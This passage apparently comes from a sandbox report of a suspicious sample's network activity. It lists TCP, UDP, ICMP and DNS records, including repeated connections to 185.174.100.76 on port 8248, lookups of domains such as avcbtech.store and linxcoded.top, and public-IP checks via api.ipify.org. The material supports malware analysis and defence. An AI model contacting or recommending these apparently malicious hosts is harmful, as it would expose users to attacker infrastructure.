Mar 24, 2025 21:31:37.297736883 CET	8248	49774	185.174.100.76	192.168.2.5
Mar 24, 2025 21:31:42.919223070 CET	443	49789	142.250.81.228	192.168.2.5
Mar 24, 2025 21:31:42.919372082 CET	443	49789	142.250.81.228	192.168.2.5
Mar 24, 2025 21:31:42.919615984 CET	49789	443	192.168.2.5	142.250.81.228
Mar 24, 2025 21:31:43.625767946 CET	49789	443	192.168.2.5	142.250.81.228
Mar 24, 2025 21:31:43.625797033 CET	443	49789	142.250.81.228	192.168.2.5
Mar 24, 2025 21:31:52.141230106 CET	49780	8248	192.168.2.5	185.174.100.76
Mar 24, 2025 21:31:52.303240061 CET	8248	49780	185.174.100.76	192.168.2.5
Mar 24, 2025 21:31:58.909838915 CET	49762	8248	192.168.2.5	185.174.100.76
Mar 24, 2025 21:31:59.069396019 CET	8248	49762	185.174.100.76	192.168.2.5
Mar 24, 2025 21:32:04.937534094 CET	49785	8248	192.168.2.5	185.174.100.76
Mar 24, 2025 21:32:05.103379965 CET	8248	49785	185.174.100.76	192.168.2.5
Mar 24, 2025 21:32:08.102543116 CET	49790	443	192.168.2.5	104.168.138.190
Mar 24, 2025 21:32:08.102590084 CET	443	49790	104.168.138.190	192.168.2.5
Mar 24, 2025 21:32:08.102649927 CET	49790	443	192.168.2.5	104.168.138.190
Mar 24, 2025 21:32:08.102889061 CET	49790	443	192.168.2.5	104.168.138.190
Mar 24, 2025 21:32:08.102905035 CET	443	49790	104.168.138.190	192.168.2.5
Mar 24, 2025 21:32:08.104487896 CET	49791	8248	192.168.2.5	185.174.100.76
Mar 24, 2025 21:32:08.260070086 CET	8248	49791	185.174.100.76	192.168.2.5
Mar 24, 2025 21:32:08.260159969 CET	49791	8248	192.168.2.5	185.174.100.76
Mar 24, 2025 21:32:08.260402918 CET	49791	8248	192.168.2.5	185.174.100.76
Mar 24, 2025 21:32:08.418864965 CET	8248	49791	185.174.100.76	192.168.2.5
Mar 24, 2025 21:32:08.419158936 CET	49791	8248	192.168.2.5	185.174.100.76
Mar 24, 2025 21:32:08.419600964 CET	49791	8248	192.168.2.5	185.174.100.76
Mar 24, 2025 21:32:08.421046019 CET	443	49790	104.168.138.190	192.168.2.5
Mar 24, 2025 21:32:08.421260118 CET	49790	443	192.168.2.5	104.168.138.190
Mar 24, 2025 21:32:08.421298027 CET	443	49790	104.168.138.190	192.168.2.5
Mar 24, 2025 21:32:08.421438932 CET	49790	443	192.168.2.5	104.168.138.190
Mar 24, 2025 21:32:08.421446085 CET	443	49790	104.168.138.190	192.168.2.5
Mar 24, 2025 21:32:08.576965094 CET	8248	49791	185.174.100.76	192.168.2.5
Mar 24, 2025 21:32:08.577102900 CET	8248	49791	185.174.100.76	192.168.2.5
Mar 24, 2025 21:32:08.580185890 CET	49792	443	192.168.2.5	104.26.12.205
Mar 24, 2025 21:32:08.580246925 CET	443	49792	104.26.12.205	192.168.2.5
Mar 24, 2025 21:32:08.580322981 CET	49792	443	192.168.2.5	104.26.12.205
Mar 24, 2025 21:32:08.580495119 CET	49792	443	192.168.2.5	104.26.12.205
Mar 24, 2025 21:32:08.580517054 CET	443	49792	104.26.12.205	192.168.2.5
Mar 24, 2025 21:32:08.630697012 CET	49791	8248	192.168.2.5	185.174.100.76
Mar 24, 2025 21:32:08.800004005 CET	443	49792	104.26.12.205	192.168.2.5
Mar 24, 2025 21:32:08.800254107 CET	49792	443	192.168.2.5	104.26.12.205
Mar 24, 2025 21:32:08.800297976 CET	443	49792	104.26.12.205	192.168.2.5
Mar 24, 2025 21:32:08.800426006 CET	49792	443	192.168.2.5	104.26.12.205
Mar 24, 2025 21:32:08.800435066 CET	443	49792	104.26.12.205	192.168.2.5
Mar 24, 2025 21:32:09.037803888 CET	443	49790	104.168.138.190	192.168.2.5
Mar 24, 2025 21:32:09.037885904 CET	443	49790	104.168.138.190	192.168.2.5
Mar 24, 2025 21:32:09.037955046 CET	49790	443	192.168.2.5	104.168.138.190
Mar 24, 2025 21:32:09.038587093 CET	49790	443	192.168.2.5	104.168.138.190
Mar 24, 2025 21:32:09.038610935 CET	443	49790	104.168.138.190	192.168.2.5
Mar 24, 2025 21:32:09.042023897 CET	49793	443	192.168.2.5	104.168.138.190
Mar 24, 2025 21:32:09.042078018 CET	443	49793	104.168.138.190	192.168.2.5
Mar 24, 2025 21:32:09.042157888 CET	49793	443	192.168.2.5	104.168.138.190
Mar 24, 2025 21:32:09.042320013 CET	49793	443	192.168.2.5	104.168.138.190
Mar 24, 2025 21:32:09.042332888 CET	443	49793	104.168.138.190	192.168.2.5
Mar 24, 2025 21:32:09.063395023 CET	443	49792	104.26.12.205	192.168.2.5
Mar 24, 2025 21:32:09.063471079 CET	443	49792	104.26.12.205	192.168.2.5
Mar 24, 2025 21:32:09.063561916 CET	49792	443	192.168.2.5	104.26.12.205
Mar 24, 2025 21:32:09.064853907 CET	49792	443	192.168.2.5	104.26.12.205
Mar 24, 2025 21:32:09.064884901 CET	443	49792	104.26.12.205	192.168.2.5
Mar 24, 2025 21:32:09.065939903 CET	49791	8248	192.168.2.5	185.174.100.76
Mar 24, 2025 21:32:09.068202019 CET	49794	443	192.168.2.5	104.26.12.205
Mar 24, 2025 21:32:09.068258047 CET	443	49794	104.26.12.205	192.168.2.5
Mar 24, 2025 21:32:09.068353891 CET	49794	443	192.168.2.5	104.26.12.205
Mar 24, 2025 21:32:09.068490028 CET	49794	443	192.168.2.5	104.26.12.205
Mar 24, 2025 21:32:09.068504095 CET	443	49794	104.26.12.205	192.168.2.5
Mar 24, 2025 21:32:09.258966923 CET	8248	49791	185.174.100.76	192.168.2.5
Mar 24, 2025 21:32:09.281125069 CET	443	49794	104.26.12.205	192.168.2.5
Mar 24, 2025 21:32:09.281595945 CET	49794	443	192.168.2.5	104.26.12.205
Mar 24, 2025 21:32:09.281662941 CET	443	49794	104.26.12.205	192.168.2.5
Mar 24, 2025 21:32:09.281759024 CET	49794	443	192.168.2.5	104.26.12.205
Mar 24, 2025 21:32:09.281773090 CET	443	49794	104.26.12.205	192.168.2.5
Mar 24, 2025 21:32:09.360109091 CET	443	49793	104.168.138.190	192.168.2.5
Mar 24, 2025 21:32:09.360450983 CET	49793	443	192.168.2.5	104.168.138.190
Mar 24, 2025 21:32:09.360483885 CET	443	49793	104.168.138.190	192.168.2.5
Mar 24, 2025 21:32:09.360614061 CET	49793	443	192.168.2.5	104.168.138.190
Mar 24, 2025 21:32:09.360620022 CET	443	49793	104.168.138.190	192.168.2.5
Mar 24, 2025 21:32:09.532355070 CET	443	49794	104.26.12.205	192.168.2.5
Mar 24, 2025 21:32:09.532434940 CET	443	49794	104.26.12.205	192.168.2.5
Mar 24, 2025 21:32:09.532562017 CET	49794	443	192.168.2.5	104.26.12.205
Mar 24, 2025 21:32:09.534384966 CET	49794	443	192.168.2.5	104.26.12.205
Mar 24, 2025 21:32:09.534434080 CET	443	49794	104.26.12.205	192.168.2.5
Mar 24, 2025 21:32:09.812623024 CET	49750	8248	192.168.2.5	185.174.100.76
Mar 24, 2025 21:32:09.872538090 CET	443	49793	104.168.138.190	192.168.2.5
Mar 24, 2025 21:32:09.872735023 CET	443	49793	104.168.138.190	192.168.2.5
Mar 24, 2025 21:32:09.872893095 CET	49793	443	192.168.2.5	104.168.138.190
Mar 24, 2025 21:32:09.873750925 CET	49793	443	192.168.2.5	104.168.138.190
Mar 24, 2025 21:32:09.873778105 CET	443	49793	104.168.138.190	192.168.2.5
Mar 24, 2025 21:32:09.968652964 CET	8248	49750	185.174.100.76	192.168.2.5
Mar 24, 2025 21:32:16.958337069 CET	49795	443	192.168.2.5	104.168.138.190
Mar 24, 2025 21:32:16.958396912 CET	443	49795	104.168.138.190	192.168.2.5
Mar 24, 2025 21:32:16.958487988 CET	49795	443	192.168.2.5	104.168.138.190
Mar 24, 2025 21:32:16.959537983 CET	49796	8248	192.168.2.5	185.174.100.76
Mar 24, 2025 21:32:16.959685087 CET	49795	443	192.168.2.5	104.168.138.190
Mar 24, 2025 21:32:16.959702015 CET	443	49795	104.168.138.190	192.168.2.5
Mar 24, 2025 21:32:17.123126030 CET	8248	49796	185.174.100.76	192.168.2.5
Mar 24, 2025 21:32:17.123262882 CET	49796	8248	192.168.2.5	185.174.100.76
Mar 24, 2025 21:32:17.123461962 CET	49796	8248	192.168.2.5	185.174.100.76
Mar 24, 2025 21:32:17.284430027 CET	8248	49796	185.174.100.76	192.168.2.5
Mar 24, 2025 21:32:17.284784079 CET	49796	8248	192.168.2.5	185.174.100.76
Mar 24, 2025 21:32:17.285207033 CET	49796	8248	192.168.2.5	185.174.100.76
Mar 24, 2025 21:32:17.288151026 CET	443	49795	104.168.138.190	192.168.2.5
Mar 24, 2025 21:32:17.288336039 CET	49795	443	192.168.2.5	104.168.138.190
Mar 24, 2025 21:32:17.288366079 CET	443	49795	104.168.138.190	192.168.2.5
Mar 24, 2025 21:32:17.288429976 CET	49795	443	192.168.2.5	104.168.138.190
Mar 24, 2025 21:32:17.288438082 CET	443	49795	104.168.138.190	192.168.2.5
Mar 24, 2025 21:32:17.443280935 CET	8248	49796	185.174.100.76	192.168.2.5
Mar 24, 2025 21:32:17.443598032 CET	8248	49796	185.174.100.76	192.168.2.5
Mar 24, 2025 21:32:17.487860918 CET	49796	8248	192.168.2.5	185.174.100.76
Mar 24, 2025 21:32:17.647785902 CET	49797	443	192.168.2.5	104.26.12.205
Mar 24, 2025 21:32:17.647854090 CET	443	49797	104.26.12.205	192.168.2.5
Mar 24, 2025 21:32:17.647941113 CET	49797	443	192.168.2.5	104.26.12.205
Mar 24, 2025 21:32:17.670516014 CET	49797	443	192.168.2.5	104.26.12.205
Mar 24, 2025 21:32:17.670562029 CET	443	49797	104.26.12.205	192.168.2.5
Mar 24, 2025 21:32:17.781892061 CET	443	49795	104.168.138.190	192.168.2.5
Mar 24, 2025 21:32:17.782151937 CET	443	49795	104.168.138.190	192.168.2.5
Mar 24, 2025 21:32:17.782202005 CET	49795	443	192.168.2.5	104.168.138.190
Mar 24, 2025 21:32:17.783719063 CET	49795	443	192.168.2.5	104.168.138.190
Mar 24, 2025 21:32:17.783746958 CET	443	49795	104.168.138.190	192.168.2.5
Mar 24, 2025 21:32:17.791484118 CET	49798	443	192.168.2.5	104.168.138.190
Mar 24, 2025 21:32:17.791529894 CET	443	49798	104.168.138.190	192.168.2.5
Mar 24, 2025 21:32:17.791588068 CET	49798	443	192.168.2.5	104.168.138.190
Mar 24, 2025 21:32:17.791814089 CET	49798	443	192.168.2.5	104.168.138.190
Mar 24, 2025 21:32:17.791826010 CET	443	49798	104.168.138.190	192.168.2.5
Mar 24, 2025 21:32:17.884316921 CET	443	49797	104.26.12.205	192.168.2.5
Mar 24, 2025 21:32:17.884562016 CET	49797	443	192.168.2.5	104.26.12.205
Mar 24, 2025 21:32:17.884592056 CET	443	49797	104.26.12.205	192.168.2.5
Mar 24, 2025 21:32:17.884728909 CET	49797	443	192.168.2.5	104.26.12.205
Mar 24, 2025 21:32:17.884733915 CET	443	49797	104.26.12.205	192.168.2.5
Mar 24, 2025 21:32:18.104370117 CET	443	49798	104.168.138.190	192.168.2.5
Mar 24, 2025 21:32:18.104640961 CET	49798	443	192.168.2.5	104.168.138.190
Mar 24, 2025 21:32:18.104674101 CET	443	49798	104.168.138.190	192.168.2.5
Mar 24, 2025 21:32:18.104800940 CET	49798	443	192.168.2.5	104.168.138.190
Mar 24, 2025 21:32:18.104805946 CET	443	49798	104.168.138.190	192.168.2.5
Mar 24, 2025 21:32:18.151859999 CET	443	49797	104.26.12.205	192.168.2.5
Mar 24, 2025 21:32:18.151930094 CET	443	49797	104.26.12.205	192.168.2.5
Mar 24, 2025 21:32:18.151978970 CET	49797	443	192.168.2.5	104.26.12.205
Mar 24, 2025 21:32:18.153533936 CET	49797	443	192.168.2.5	104.26.12.205
Mar 24, 2025 21:32:18.153552055 CET	443	49797	104.26.12.205	192.168.2.5
Mar 24, 2025 21:32:18.154742956 CET	49796	8248	192.168.2.5	185.174.100.76
Mar 24, 2025 21:32:18.158103943 CET	49799	443	192.168.2.5	104.26.12.205
Mar 24, 2025 21:32:18.158202887 CET	443	49799	104.26.12.205	192.168.2.5
Mar 24, 2025 21:32:18.158277988 CET	49799	443	192.168.2.5	104.26.12.205
Mar 24, 2025 21:32:18.158523083 CET	49799	443	192.168.2.5	104.26.12.205
Mar 24, 2025 21:32:18.158554077 CET	443	49799	104.26.12.205	192.168.2.5
Mar 24, 2025 21:32:18.352694035 CET	8248	49796	185.174.100.76	192.168.2.5
Mar 24, 2025 21:32:18.378638983 CET	443	49799	104.26.12.205	192.168.2.5
Mar 24, 2025 21:32:18.378891945 CET	49799	443	192.168.2.5	104.26.12.205
Mar 24, 2025 21:32:18.378957033 CET	443	49799	104.26.12.205	192.168.2.5
Mar 24, 2025 21:32:18.379198074 CET	49799	443	192.168.2.5	104.26.12.205
Mar 24, 2025 21:32:18.379256010 CET	443	49799	104.26.12.205	192.168.2.5
Mar 24, 2025 21:32:18.600086927 CET	443	49798	104.168.138.190	192.168.2.5
Mar 24, 2025 21:32:18.600332022 CET	443	49798	104.168.138.190	192.168.2.5
Mar 24, 2025 21:32:18.600604057 CET	49798	443	192.168.2.5	104.168.138.190
Mar 24, 2025 21:32:18.600907087 CET	49798	443	192.168.2.5	104.168.138.190
Mar 24, 2025 21:32:18.600931883 CET	443	49798	104.168.138.190	192.168.2.5
Mar 24, 2025 21:32:18.655195951 CET	443	49799	104.26.12.205	192.168.2.5
Mar 24, 2025 21:32:18.655256033 CET	443	49799	104.26.12.205	192.168.2.5
Mar 24, 2025 21:32:18.655440092 CET	49799	443	192.168.2.5	104.26.12.205
Mar 24, 2025 21:32:18.656275988 CET	49799	443	192.168.2.5	104.26.12.205
Mar 24, 2025 21:32:18.656318903 CET	443	49799	104.26.12.205	192.168.2.5
Mar 24, 2025 21:32:22.172508955 CET	49753	8248	192.168.2.5	185.174.100.76
Mar 24, 2025 21:32:22.312539101 CET	49774	8248	192.168.2.5	185.174.100.76
Mar 24, 2025 21:32:22.351675987 CET	8248	49753	185.174.100.76	192.168.2.5
Mar 24, 2025 21:32:22.472635031 CET	8248	49774	185.174.100.76	192.168.2.5
Mar 24, 2025 21:32:37.313123941 CET	49780	8248	192.168.2.5	185.174.100.76
Mar 24, 2025 21:32:37.478878975 CET	8248	49780	185.174.100.76	192.168.2.5
Mar 24, 2025 21:32:44.078433990 CET	49762	8248	192.168.2.5	185.174.100.76
Mar 24, 2025 21:32:44.238075972 CET	8248	49762	185.174.100.76	192.168.2.5
Mar 24, 2025 21:32:50.109781981 CET	49785	8248	192.168.2.5	185.174.100.76
Mar 24, 2025 21:32:50.268985987 CET	8248	49785	185.174.100.76	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 24, 2025 21:29:28.683317900 CET	53	55327	1.1.1.1	192.168.2.5
Mar 24, 2025 21:29:28.695245981 CET	53	61114	1.1.1.1	192.168.2.5
Mar 24, 2025 21:29:29.360729933 CET	53	52432	1.1.1.1	192.168.2.5
Mar 24, 2025 21:29:29.436583042 CET	53	56109	1.1.1.1	192.168.2.5
Mar 24, 2025 21:29:32.500189066 CET	64895	53	192.168.2.5	1.1.1.1
Mar 24, 2025 21:29:32.500341892 CET	65293	53	192.168.2.5	1.1.1.1
Mar 24, 2025 21:29:32.610435963 CET	53	64895	1.1.1.1	192.168.2.5
Mar 24, 2025 21:29:32.611126900 CET	53	65293	1.1.1.1	192.168.2.5
Mar 24, 2025 21:29:34.327028990 CET	54095	53	192.168.2.5	1.1.1.1
Mar 24, 2025 21:29:34.327173948 CET	60258	53	192.168.2.5	1.1.1.1
Mar 24, 2025 21:29:34.527167082 CET	53	54095	1.1.1.1	192.168.2.5
Mar 24, 2025 21:29:34.537712097 CET	53	60258	1.1.1.1	192.168.2.5
Mar 24, 2025 21:29:35.854083061 CET	53331	53	192.168.2.5	1.1.1.1
Mar 24, 2025 21:29:35.854238987 CET	51791	53	192.168.2.5	1.1.1.1
Mar 24, 2025 21:29:36.148613930 CET	53	53331	1.1.1.1	192.168.2.5
Mar 24, 2025 21:29:36.179435968 CET	53	51791	1.1.1.1	192.168.2.5
Mar 24, 2025 21:29:37.649703026 CET	53	55678	1.1.1.1	192.168.2.5
Mar 24, 2025 21:29:38.755455971 CET	64497	53	192.168.2.5	1.1.1.1
Mar 24, 2025 21:29:38.755511045 CET	49317	53	192.168.2.5	1.1.1.1
Mar 24, 2025 21:29:38.859535933 CET	53	49317	1.1.1.1	192.168.2.5
Mar 24, 2025 21:29:38.860373974 CET	53	64497	1.1.1.1	192.168.2.5
Mar 24, 2025 21:29:39.480843067 CET	53329	53	192.168.2.5	1.1.1.1
Mar 24, 2025 21:29:39.481066942 CET	63761	53	192.168.2.5	1.1.1.1
Mar 24, 2025 21:29:39.589323997 CET	53	53329	1.1.1.1	192.168.2.5
Mar 24, 2025 21:29:39.590698957 CET	53	63761	1.1.1.1	192.168.2.5
Mar 24, 2025 21:29:40.035187006 CET	54103	53	192.168.2.5	1.1.1.1
Mar 24, 2025 21:29:40.035187006 CET	60851	53	192.168.2.5	1.1.1.1
Mar 24, 2025 21:29:40.145028114 CET	53	54103	1.1.1.1	192.168.2.5
Mar 24, 2025 21:29:40.171691895 CET	53	60851	1.1.1.1	192.168.2.5
Mar 24, 2025 21:29:46.456367970 CET	53	60853	1.1.1.1	192.168.2.5
Mar 24, 2025 21:29:51.737685919 CET	64877	53	192.168.2.5	1.1.1.1
Mar 24, 2025 21:29:51.737893105 CET	55621	53	192.168.2.5	1.1.1.1
Mar 24, 2025 21:29:52.036102057 CET	53	64877	1.1.1.1	192.168.2.5
Mar 24, 2025 21:29:52.117459059 CET	53	55621	1.1.1.1	192.168.2.5
Mar 24, 2025 21:29:53.591754913 CET	56193	53	192.168.2.5	1.1.1.1
Mar 24, 2025 21:29:53.592093945 CET	53207	53	192.168.2.5	1.1.1.1
Mar 24, 2025 21:29:53.696115971 CET	53	56193	1.1.1.1	192.168.2.5
Mar 24, 2025 21:29:53.696176052 CET	53	53207	1.1.1.1	192.168.2.5
Mar 24, 2025 21:29:54.270510912 CET	64624	53	192.168.2.5	1.1.1.1
Mar 24, 2025 21:29:54.270652056 CET	65103	53	192.168.2.5	1.1.1.1
Mar 24, 2025 21:29:54.380347013 CET	53	64624	1.1.1.1	192.168.2.5
Mar 24, 2025 21:29:54.381361008 CET	53	65103	1.1.1.1	192.168.2.5
Mar 24, 2025 21:30:04.558234930 CET	61794	53	192.168.2.5	1.1.1.1
Mar 24, 2025 21:30:04.558496952 CET	53738	53	192.168.2.5	1.1.1.1
Mar 24, 2025 21:30:04.920557022 CET	53	61794	1.1.1.1	192.168.2.5
Mar 24, 2025 21:30:04.954683065 CET	53	53738	1.1.1.1	192.168.2.5
Mar 24, 2025 21:30:05.552227020 CET	53	51932	1.1.1.1	192.168.2.5
Mar 24, 2025 21:30:15.920666933 CET	52753	53	192.168.2.5	1.1.1.1
Mar 24, 2025 21:30:15.920666933 CET	59774	53	192.168.2.5	1.1.1.1
Mar 24, 2025 21:30:16.107558966 CET	53	52753	1.1.1.1	192.168.2.5
Mar 24, 2025 21:30:16.257714033 CET	53	59774	1.1.1.1	192.168.2.5
Mar 24, 2025 21:30:25.262348890 CET	138	138	192.168.2.5	192.168.2.255
Mar 24, 2025 21:30:27.938886881 CET	53	62244	1.1.1.1	192.168.2.5
Mar 24, 2025 21:30:28.629481077 CET	53	58187	1.1.1.1	192.168.2.5
Mar 24, 2025 21:30:30.830271006 CET	53	56427	1.1.1.1	192.168.2.5
Mar 24, 2025 21:30:58.406874895 CET	53	49860	1.1.1.1	192.168.2.5
Mar 24, 2025 21:31:06.309935093 CET	57429	53	192.168.2.5	1.1.1.1
Mar 24, 2025 21:31:06.310087919 CET	64937	53	192.168.2.5	1.1.1.1
Mar 24, 2025 21:31:06.417301893 CET	53	57429	1.1.1.1	192.168.2.5
Mar 24, 2025 21:31:06.417803049 CET	53	64937	1.1.1.1	192.168.2.5
Mar 24, 2025 21:31:19.733143091 CET	63125	53	192.168.2.5	1.1.1.1
Mar 24, 2025 21:31:19.733277082 CET	53217	53	192.168.2.5	1.1.1.1
Mar 24, 2025 21:31:19.834511042 CET	53	53217	1.1.1.1	192.168.2.5
Mar 24, 2025 21:31:19.835410118 CET	53	63125	1.1.1.1	192.168.2.5
Mar 24, 2025 21:31:32.610557079 CET	54717	53	192.168.2.5	1.1.1.1
Mar 24, 2025 21:31:32.610996008 CET	49186	53	192.168.2.5	1.1.1.1
Mar 24, 2025 21:31:32.717432976 CET	53	54717	1.1.1.1	192.168.2.5
Mar 24, 2025 21:31:32.717453957 CET	53	49186	1.1.1.1	192.168.2.5
Mar 24, 2025 21:31:43.755795002 CET	53	52880	1.1.1.1	192.168.2.5
Mar 24, 2025 21:32:17.523514032 CET	65484	53	192.168.2.5	1.1.1.1
Mar 24, 2025 21:32:17.523786068 CET	59700	53	192.168.2.5	1.1.1.1
Mar 24, 2025 21:32:17.631124973 CET	53	65484	1.1.1.1	192.168.2.5
Mar 24, 2025 21:32:17.632100105 CET	53	59700	1.1.1.1	192.168.2.5

ICMP Packets

Timestamp	Source IP	Dest IP	Checksum	Code	Type
Mar 24, 2025 21:29:29.360800982 CET	192.168.2.5	1.1.1.1	c223	(Port unreachable)	Destination Unreachable
Mar 24, 2025 21:29:52.117541075 CET	192.168.2.5	1.1.1.1	c23f	(Port unreachable)	Destination Unreachable
Mar 24, 2025 21:30:16.257780075 CET	192.168.2.5	1.1.1.1	c237	(Port unreachable)	Destination Unreachable

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Mar 24, 2025 21:29:32.500189066 CET	192.168.2.5	1.1.1.1	0xd9a7	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Mar 24, 2025 21:29:32.500341892 CET	192.168.2.5	1.1.1.1	0xb5a	Standard query (0)	www.google.com	65	IN (0x0001)	false
Mar 24, 2025 21:29:34.327028990 CET	192.168.2.5	1.1.1.1	0x68ee	Standard query (0)	office.avcbtech.store	A (IP address)	IN (0x0001)	false
Mar 24, 2025 21:29:34.327173948 CET	192.168.2.5	1.1.1.1	0xff2e	Standard query (0)	office.avcbtech.store	65	IN (0x0001)	false
Mar 24, 2025 21:29:35.854083061 CET	192.168.2.5	1.1.1.1	0x1825	Standard query (0)	sender.linxcoded.top	A (IP address)	IN (0x0001)	false
Mar 24, 2025 21:29:35.854238987 CET	192.168.2.5	1.1.1.1	0x361	Standard query (0)	sender.linxcoded.top	65	IN (0x0001)	false
Mar 24, 2025 21:29:38.755455971 CET	192.168.2.5	1.1.1.1	0x4364	Standard query (0)	code.jquery.com	A (IP address)	IN (0x0001)	false
Mar 24, 2025 21:29:38.755511045 CET	192.168.2.5	1.1.1.1	0xf8c6	Standard query (0)	code.jquery.com	65	IN (0x0001)	false
Mar 24, 2025 21:29:39.480843067 CET	192.168.2.5	1.1.1.1	0x9d77	Standard query (0)	i.imgur.com	A (IP address)	IN (0x0001)	false
Mar 24, 2025 21:29:39.481066942 CET	192.168.2.5	1.1.1.1	0xd531	Standard query (0)	i.imgur.com	65	IN (0x0001)	false
Mar 24, 2025 21:29:40.035187006 CET	192.168.2.5	1.1.1.1	0x93cd	Standard query (0)	i.imgur.com	A (IP address)	IN (0x0001)	false
Mar 24, 2025 21:29:40.035187006 CET	192.168.2.5	1.1.1.1	0xcf7f	Standard query (0)	i.imgur.com	65	IN (0x0001)	false
Mar 24, 2025 21:29:51.737685919 CET	192.168.2.5	1.1.1.1	0xdb3e	Standard query (0)	server1.linxcoded.top	A (IP address)	IN (0x0001)	false
Mar 24, 2025 21:29:51.737893105 CET	192.168.2.5	1.1.1.1	0x1acc	Standard query (0)	_8248._https.server1.linxcoded.top	65	IN (0x0001)	false
Mar 24, 2025 21:29:53.591754913 CET	192.168.2.5	1.1.1.1	0x8448	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
Mar 24, 2025 21:29:53.592093945 CET	192.168.2.5	1.1.1.1	0x2b41	Standard query (0)	api.ipify.org	65	IN (0x0001)	false
Mar 24, 2025 21:29:54.270510912 CET	192.168.2.5	1.1.1.1	0x50e6	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
Mar 24, 2025 21:29:54.270652056 CET	192.168.2.5	1.1.1.1	0xc5b5	Standard query (0)	api.ipify.org	65	IN (0x0001)	false
Mar 24, 2025 21:30:04.558234930 CET	192.168.2.5	1.1.1.1	0x3180	Standard query (0)	avcbtech.site	A (IP address)	IN (0x0001)	false
Mar 24, 2025 21:30:04.558496952 CET	192.168.2.5	1.1.1.1	0x259d	Standard query (0)	avcbtech.site	65	IN (0x0001)	false
Mar 24, 2025 21:30:15.920666933 CET	192.168.2.5	1.1.1.1	0x7182	Standard query (0)	avcbtech.site	A (IP address)	IN (0x0001)	false
Mar 24, 2025 21:30:15.920666933 CET	192.168.2.5	1.1.1.1	0xed51	Standard query (0)	avcbtech.site	65	IN (0x0001)	false
Mar 24, 2025 21:31:06.309935093 CET	192.168.2.5	1.1.1.1	0x4336	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
Mar 24, 2025 21:31:06.310087919 CET	192.168.2.5	1.1.1.1	0xa3da	Standard query (0)	api.ipify.org	65	IN (0x0001)	false
Mar 24, 2025 21:31:19.733143091 CET	192.168.2.5	1.1.1.1	0x2d92	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
Mar 24, 2025 21:31:19.733277082 CET	192.168.2.5	1.1.1.1	0xa4	Standard query (0)	api.ipify.org	65	IN (0x0001)	false
Mar 24, 2025 21:31:32.610557079 CET	192.168.2.5	1.1.1.1	0xa5e5	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Mar 24, 2025 21:31:32.610996008 CET	192.168.2.5	1.1.1.1	0xc383	Standard query (0)	www.google.com	65	IN (0x0001)	false
Mar 24, 2025 21:32:17.523514032 CET	192.168.2.5	1.1.1.1	0xa398	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
Mar 24, 2025 21:32:17.523786068 CET	192.168.2.5	1.1.1.1	0x6562	Standard query (0)	api.ipify.org	65	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Mar 24, 2025 21:29:32.610435963 CET	1.1.1.1	192.168.2.5	0xd9a7	No error (0)	www.google.com		142.251.40.132	A (IP address)	IN (0x0001)	false
Mar 24, 2025 21:29:32.611126900 CET	1.1.1.1	192.168.2.5	0xb5a	No error (0)	www.google.com			65	IN (0x0001)	false
Mar 24, 2025 21:29:34.527167082 CET	1.1.1.1	192.168.2.5	0x68ee	No error (0)	office.avcbtech.store		139.28.36.38	A (IP address)	IN (0x0001)	false
Mar 24, 2025 21:29:36.148613930 CET	1.1.1.1	192.168.2.5	0x1825	No error (0)	sender.linxcoded.top		185.174.100.20	A (IP address)	IN (0x0001)	false
Mar 24, 2025 21:29:38.860373974 CET	1.1.1.1	192.168.2.5	0x4364	No error (0)	code.jquery.com		151.101.66.137	A (IP address)	IN (0x0001)	false
Mar 24, 2025 21:29:38.860373974 CET	1.1.1.1	192.168.2.5	0x4364	No error (0)	code.jquery.com		151.101.194.137	A (IP address)	IN (0x0001)	false
Mar 24, 2025 21:29:38.860373974 CET	1.1.1.1	192.168.2.5	0x4364	No error (0)	code.jquery.com		151.101.130.137	A (IP address)	IN (0x0001)	false
Mar 24, 2025 21:29:38.860373974 CET	1.1.1.1	192.168.2.5	0x4364	No error (0)	code.jquery.com		151.101.2.137	A (IP address)	IN (0x0001)	false
Mar 24, 2025 21:29:39.588134050 CET	1.1.1.1	192.168.2.5	0x9c51	No error (0)	shed.dual-low.s-part-0012.t-0009.t-msedge.net	s-part-0012.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Mar 24, 2025 21:29:39.588134050 CET	1.1.1.1	192.168.2.5	0x9c51	No error (0)	s-part-0012.t-0009.t-msedge.net		13.107.246.40	A (IP address)	IN (0x0001)	false
Mar 24, 2025 21:29:39.589323997 CET	1.1.1.1	192.168.2.5	0x9d77	No error (0)	i.imgur.com	ipv4.imgur.map.fastly.net		CNAME (Canonical name)	IN (0x0001)	false
Mar 24, 2025 21:29:39.589323997 CET	1.1.1.1	192.168.2.5	0x9d77	No error (0)	ipv4.imgur.map.fastly.net		199.232.196.193	A (IP address)	IN (0x0001)	false
Mar 24, 2025 21:29:39.589323997 CET	1.1.1.1	192.168.2.5	0x9d77	No error (0)	ipv4.imgur.map.fastly.net		199.232.192.193	A (IP address)	IN (0x0001)	false
Mar 24, 2025 21:29:39.590698957 CET	1.1.1.1	192.168.2.5	0xd531	No error (0)	i.imgur.com	ipv4.imgur.map.fastly.net		CNAME (Canonical name)	IN (0x0001)	false
Mar 24, 2025 21:29:40.145028114 CET	1.1.1.1	192.168.2.5	0x93cd	No error (0)	i.imgur.com	ipv4.imgur.map.fastly.net		CNAME (Canonical name)	IN (0x0001)	false
Mar 24, 2025 21:29:40.145028114 CET	1.1.1.1	192.168.2.5	0x93cd	No error (0)	ipv4.imgur.map.fastly.net		199.232.192.193	A (IP address)	IN (0x0001)	false
Mar 24, 2025 21:29:40.145028114 CET	1.1.1.1	192.168.2.5	0x93cd	No error (0)	ipv4.imgur.map.fastly.net		199.232.196.193	A (IP address)	IN (0x0001)	false
Mar 24, 2025 21:29:40.171691895 CET	1.1.1.1	192.168.2.5	0xcf7f	No error (0)	i.imgur.com	ipv4.imgur.map.fastly.net		CNAME (Canonical name)	IN (0x0001)	false
